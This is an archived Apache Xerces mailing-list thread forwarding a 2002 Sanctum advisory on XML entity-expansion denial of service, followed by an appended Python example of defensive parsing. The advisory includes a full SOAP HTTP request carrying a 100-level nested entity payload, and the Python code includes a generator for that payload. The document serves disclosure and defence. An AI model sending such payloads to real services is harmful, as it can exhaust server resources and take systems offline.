Okay, it looks like Sanctum has decided that Xerces is the problem, and
they are going to issue a security
alert against us.  Other than Sanjiva's suggestion of a flag to turn off
internal (or probably all) entity expansion,
does anyone have any other ideas of how to fix this?

Ted
----- Original Message -----
From: "Ben Laurie" <[EMAIL PROTECTED]>
To: "Ted Leung" <[EMAIL PROTECTED]>
Sent: Wednesday, November 27, 2002 3:37 AM
Subject: [Fwd: Security Alert - Xerces]


> Here ya go. Please keep security@ copied on any followups...
>
> Cheers,
>
> Ben.
>
> --
> http://www.apache-ssl.org/ben.html       http://www.thebunker.net/
>
> "There is no limit to what a man can do or how far he can go if he
> doesn't mind who gets the credit." - Robert Woodruff
>
--- Begin Message ---
Dear [EMAIL PROTECTED],

During a recent security audit at one of our customers, Sanctum found a
security vulnerability in your product Xerces.
The details of this vulnerability are described in the attached text file.

We intend to issue a public advisory on BugTraq, SecuriTeam and other site
forums about this vulnerability the last week of November.  Please note, the
advisory will not contain specifics that might enable someone to exploit the
vulnerability. 

We would appreciate it if you could issue a patch in that timeline (i.e.
around November 25th), so it can be linked to our advisory.

Please feel free to contact me for more information/help.

Thanks,
-Amit

 <<XML_DTD_Xerces.txt>> 
///////////////////////////////////////////////////////////////////////
========================>> Security Advisory <<========================
///////////////////////////////////////////////////////////////////////


=> Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/

=> Release date: 14/Nov/2002

=> Vendor: Apache Group

The following product was found to be vulnerable: 

  - Apache Xerces XML parser

The versions affected are the latest ones (as of October 2002).

=> Severity: High

=> CVE candidate: Not assigned yet.

=> Summary: Using the DTD part of the XML document, it is possible to cause the 
XML parser to consume 100% CPU and a lot of memory, therefore resulting in 
a denial of service condition.

=> Description: The DTD part of the XML document enables the document to define 
named entities (other than the predefined &lt;, &gt;, etc.). The entities can be
defined using other entities (recursion is prohibited in XML 1.0). 
Entities are expanded when they are referenced, inside the XML document. 
The attack is comprised of defining and referencing an entity which is defined 
using two instances of another entity, which is (in turn) defined as two instances
of yet another entity, and so on. This definition process can be repeated as long
as "necessary" - we found that nesting level of 100 is usually sufficient.
The 100th entity should be defined simply as a string. This has the effect of having
the first entity contain, in theory, 2^99 (two to the power of ninety nine) 
concatenated values of the 100th entity.
Here's an example (the DTD is to be placed after the XML declaration, and before the 
root element of the XML document):

        <!DOCTYPE root [
        <!ENTITY x100 "foobar">
        <!ENTITY  x99 "&x100;&x100;">
        <!ENTITY  x98 "&x99;&x99;">
        <!ENTITY  x97 "&x98;&x98;">
        ...
        <!ENTITY   x3 "&x4;&x4;">
        <!ENTITY   x2 "&x3;&x3;">
        <!ENTITY   x1 "&x2;&x2;">
        ]>

Referring to the first entity inside a document that would otherwise be accepted by
the application (using the syntax &x1;), results in a DoS condition, due to the 
excessive CPU load and memory required by the XML parser to expand this entity. 

It should be noted that this attack works only when the XML product does indeed honor
the DTD directives embedded in the document. Also, it is required (at least in some
implementations) that the data in which the entity is embedded be required by the
application, in order for the entity to be expanded and the attack to take place.

=> Solution: Not available yet.

=> Workaround:

If possible, disable DTD in the XML parser. 

=> Example (SOAP):

Ory Segal from Sanctum provided the following example:

The request is:

POST path_to_web_service HTTP/1.0
Host: ...
Content-Type: text/xml
SOAPAction: ""
Content-Length: 3224

<?xml version="1.0" ?>
<!DOCTYPE foobar [
        <!ENTITY x0 "hello">
        <!ENTITY x1 "&x0;&x0;">
        <!ENTITY x2 "&x1;&x1;">
        <!ENTITY x3 "&x2;&x2;">
        <!ENTITY x4 "&x3;&x3;">
        <!ENTITY x5 "&x4;&x4;">
        <!ENTITY x6 "&x5;&x5;">
        <!ENTITY x7 "&x6;&x6;">
        <!ENTITY x8 "&x7;&x7;">
        <!ENTITY x9 "&x8;&x8;">
        <!ENTITY x10 "&x9;&x9;">
        <!ENTITY x11 "&x10;&x10;">
        <!ENTITY x12 "&x11;&x11;">
        <!ENTITY x13 "&x12;&x12;">
        <!ENTITY x14 "&x13;&x13;">
        <!ENTITY x15 "&x14;&x14;">
        <!ENTITY x16 "&x15;&x15;">
        <!ENTITY x17 "&x16;&x16;">
        <!ENTITY x18 "&x17;&x17;">
        <!ENTITY x19 "&x18;&x18;">
        <!ENTITY x20 "&x19;&x19;">
        <!ENTITY x21 "&x20;&x20;">
        <!ENTITY x22 "&x21;&x21;">
        <!ENTITY x23 "&x22;&x22;">
        <!ENTITY x24 "&x23;&x23;">
        <!ENTITY x25 "&x24;&x24;">
        <!ENTITY x26 "&x25;&x25;">
        <!ENTITY x27 "&x26;&x26;">
        <!ENTITY x28 "&x27;&x27;">
        <!ENTITY x29 "&x28;&x28;">
        <!ENTITY x30 "&x29;&x29;">
        <!ENTITY x31 "&x30;&x30;">
        <!ENTITY x32 "&x31;&x31;">
        <!ENTITY x33 "&x32;&x32;">
        <!ENTITY x34 "&x33;&x33;">
        <!ENTITY x35 "&x34;&x34;">
        <!ENTITY x36 "&x35;&x35;">
        <!ENTITY x37 "&x36;&x36;">
        <!ENTITY x38 "&x37;&x37;">
        <!ENTITY x39 "&x38;&x38;">
        <!ENTITY x40 "&x39;&x39;">
        <!ENTITY x41 "&x40;&x40;">
        <!ENTITY x42 "&x41;&x41;">
        <!ENTITY x43 "&x42;&x42;">
        <!ENTITY x44 "&x43;&x43;">
        <!ENTITY x45 "&x44;&x44;">
        <!ENTITY x46 "&x45;&x45;">
        <!ENTITY x47 "&x46;&x46;">
        <!ENTITY x48 "&x47;&x47;">
        <!ENTITY x49 "&x48;&x48;">
        <!ENTITY x50 "&x49;&x49;">
        <!ENTITY x51 "&x50;&x50;">
        <!ENTITY x52 "&x51;&x51;">
        <!ENTITY x53 "&x52;&x52;">
        <!ENTITY x54 "&x53;&x53;">
        <!ENTITY x55 "&x54;&x54;">
        <!ENTITY x56 "&x55;&x55;">
        <!ENTITY x57 "&x56;&x56;">
        <!ENTITY x58 "&x57;&x57;">
        <!ENTITY x59 "&x58;&x58;">
        <!ENTITY x60 "&x59;&x59;">
        <!ENTITY x61 "&x60;&x60;">
        <!ENTITY x62 "&x61;&x61;">
        <!ENTITY x63 "&x62;&x62;">
        <!ENTITY x64 "&x63;&x63;">
        <!ENTITY x65 "&x64;&x64;">
        <!ENTITY x66 "&x65;&x65;">
        <!ENTITY x67 "&x66;&x66;">
        <!ENTITY x68 "&x67;&x67;">
        <!ENTITY x69 "&x68;&x68;">
        <!ENTITY x70 "&x69;&x69;">
        <!ENTITY x71 "&x70;&x70;">
        <!ENTITY x72 "&x71;&x71;">
        <!ENTITY x73 "&x72;&x72;">
        <!ENTITY x74 "&x73;&x73;">
        <!ENTITY x75 "&x74;&x74;">
        <!ENTITY x76 "&x75;&x75;">
        <!ENTITY x77 "&x76;&x76;">
        <!ENTITY x78 "&x77;&x77;">
        <!ENTITY x79 "&x78;&x78;">
        <!ENTITY x80 "&x79;&x79;">
        <!ENTITY x81 "&x80;&x80;">
        <!ENTITY x82 "&x81;&x81;">
        <!ENTITY x83 "&x82;&x82;">
        <!ENTITY x84 "&x83;&x83;">
        <!ENTITY x85 "&x84;&x84;">
        <!ENTITY x86 "&x85;&x85;">
        <!ENTITY x87 "&x86;&x86;">
        <!ENTITY x88 "&x87;&x87;">
        <!ENTITY x89 "&x88;&x88;">
        <!ENTITY x90 "&x89;&x89;">
        <!ENTITY x91 "&x90;&x90;">
        <!ENTITY x92 "&x91;&x91;">
        <!ENTITY x93 "&x92;&x92;">
        <!ENTITY x94 "&x93;&x93;">
        <!ENTITY x95 "&x94;&x94;">
        <!ENTITY x96 "&x95;&x95;">
        <!ENTITY x97 "&x96;&x96;">
        <!ENTITY x98 "&x97;&x97;">
        <!ENTITY x99 "&x98;&x98;">
        <!ENTITY x100 "&x99;&x99;">
]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/1999/XMLSchema">
<SOAP-ENV:Body>
<ns1:aaa xmlns:ns1="urn:aaa"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<foobar xsi:type="xsd:string">&x100;</foobar>
</ns1:aaa>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

---------------------------------------------------------------------
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
--- End Message ---
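The two defences discussed above (Sanjiva's "flag to turn off entity expansion" and the advisory's "disable DTD" workaround) both come down to the same question: how does a parser refuse to do 2^99 units of work on a 3 KB request? The following is an added example, not code from Xerces or from the Sanctum advisory. It uses Python's stdlib expat parser as a stand-in for Xerces, and it demonstrates two approaches: (1) a static pre-scan of the internal DTD subset that computes how large each entity would expand to, without actually expanding it, and rejects the document once any entity crosses a limit (this also catches the recursive definitions XML 1.0 forbids); and (2) a parse mode that rejects any DOCTYPE outright, which is the stdlib equivalent of "disable DTD". The regex-based scan, the 1,000,000-character limit, the function names and the sample documents are all assumptions of this example; the scan handles only internal general entities with literal values and ignores external and parameter entities.

```python
"""Bounded entity expansion: static accounting before parsing, plus a parse mode that
refuses any DOCTYPE.  Added example (not Xerces code); expat stands in for Xerces."""
import re
import xml.parsers.expat

# Internal general entity declarations with a literal value.  External entities,
# parameter entities and a "]>" inside a literal are out of scope (assumption).
ENTITY_DECL = re.compile(r'<!ENTITY\s+([A-Za-z_][\w.-]*)\s+(?:"([^"]*)"|\'([^\']*)\')\s*>')
ENTITY_REF = re.compile(r'&([A-Za-z_][\w.-]*);')
INTERNAL_SUBSET = re.compile(r'<!DOCTYPE[^\[>]*\[(.*?)\]\s*>', re.S)
PREDEFINED = {"lt", "gt", "amp", "apos", "quot"}   # each expands to one character


class EntityExpansionError(ValueError):
    """Raised when the DTD would expand past the limit, is recursive, or is refused."""


def build_attack_doc(depth=100, leaf="foobar"):
    """Constructed sample input: the advisory's chain, x{depth} = leaf and each
    x{i} = two copies of x{i+1}, so &x1; expands to 2**(depth-1) copies of the leaf."""
    decls = [f'<!ENTITY x{depth} "{leaf}">']
    for i in range(depth - 1, 0, -1):
        decls.append(f'<!ENTITY x{i} "&x{i + 1};&x{i + 1};">')
    return ('<?xml version="1.0"?>\n<!DOCTYPE root [\n' + "\n".join(decls)
            + '\n]>\n<root>&x1;</root>\n')


def expanded_sizes(doc, limit=1_000_000):
    """Return {entity name: fully expanded length in characters} for every internal
    general entity in doc's internal DTD subset, computed by recursing over the
    definitions instead of building the strings.  Raises EntityExpansionError as
    soon as any entity would exceed `limit`, and on cyclic definitions."""
    m = INTERNAL_SUBSET.search(doc)
    if m is None:
        return {}
    defs = {}
    for d in ENTITY_DECL.finditer(m.group(1)):
        value = d.group(2) if d.group(2) is not None else d.group(3)
        defs.setdefault(d.group(1), value)      # XML: first declaration of a name wins
    sizes, in_progress = {}, set()

    def size(name):
        if name in sizes:
            return sizes[name]
        if name in in_progress:
            raise EntityExpansionError(f"recursive entity reference: {name}")
        in_progress.add(name)
        value, total, pos = defs[name], 0, 0
        for ref in ENTITY_REF.finditer(value):
            total += ref.start() - pos          # literal text before the reference
            target = ref.group(1)
            if target in PREDEFINED:
                total += 1
            elif target in defs:
                total += size(target)
            else:
                raise EntityExpansionError(f"undefined entity: {target}")
            pos = ref.end()
            if total > limit:                   # abort early; never materialise the text
                raise EntityExpansionError(f"entity {name} expands past {limit} characters")
        total += len(value) - pos               # trailing literal text
        in_progress.discard(name)
        sizes[name] = total
        return total

    for name in defs:
        size(name)
    return sizes


def expand_with_expat(doc):
    """Let expat really expand the document and return the number of characters of
    element text it delivers; used to confirm the static accounting against a parser."""
    parser = xml.parsers.expat.ParserCreate()
    count = 0

    def on_text(data):
        nonlocal count
        count += len(data)

    parser.CharacterDataHandler = on_text
    parser.Parse(doc, True)
    return count


def parse_rejecting_doctype(doc):
    """The advisory's workaround in stdlib terms: refuse any DOCTYPE, so no entity
    declaration (internal or external) is ever processed.  Returns element names seen."""
    parser = xml.parsers.expat.ParserCreate()
    names = []

    def reject(doctype_name, system_id, public_id, has_internal_subset):
        raise EntityExpansionError(f"DOCTYPE '{doctype_name}' rejected: DTD processing disabled")

    parser.StartDoctypeDeclHandler = reject     # exception propagates out of Parse()
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(doc, True)
    return names


def safe_parse(doc, limit=1_000_000):
    """Keep internal entities but parse only after the static bound has passed.
    Returns the total expanded text length."""
    expanded_sizes(doc, limit)
    return expand_with_expat(doc)


if __name__ == "__main__":
    print(expanded_sizes(build_attack_doc(10))["x1"])   # 3072 = 2**9 * len("foobar")
    try:
        safe_parse(build_attack_doc(100))                # the advisory's 100-level chain
    except EntityExpansionError as err:
        print("rejected:", err)
```

The static scan is the shape a "flag" fix can take without losing DTD support: accounting is linear in the size of the DTD, and the 100-level chain is rejected around the 20th doubling rather than after 2^99 expansions. Rejecting the DOCTYPE is the blunter option and also stops external entity fetches. In Xerces-J terms the latter corresponds to setting the feature http://apache.org/xml/features/disallow-doctype-decl to true, which later Xerces2-J releases expose.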